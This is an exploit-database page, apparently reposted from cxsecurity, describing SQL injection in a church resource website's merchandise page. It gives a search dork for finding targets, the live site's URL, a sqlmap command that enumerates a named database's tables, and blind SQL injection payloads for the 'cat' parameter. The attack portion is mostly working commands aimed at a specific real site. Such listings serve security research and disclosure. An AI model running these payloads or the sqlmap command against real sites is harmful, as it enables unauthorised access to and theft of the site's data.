Advertisement






Ministryfocusets SQL Injection

CVE Category Price Severity
CVE-2021-39295 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-05-18
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050190

Below is a copy:

Ministryfocusets SQL Injection
# Exploit Title:Ministryfocusets SQL Injection
//////////////////////////////////////////////////////
# Date:18.05.2019
//////////////////////////////////////////////////////
# Dork :intitle:"Ministry Focus ETS - The pastor resource site for "Equipping the Saints"  id=
//////////////////////////////////////////////////////
# Exploit Author:Cerkuday
//////////////////////////////////////////////////////
# Tested on:Windows &Kali Linux
//////////////////////////////////////////////////////

Demo:
http://ministryfocusets.com/merchandise/index.php?cat=1
//////////////////////////////////////////////////////

# Poc:
sqlmap.py -u "http://ministryfocusets.com/merchandise/index.php?cat=1"  --random-agent -D ministry_gkgwcm --tables


---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 2340=2340

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum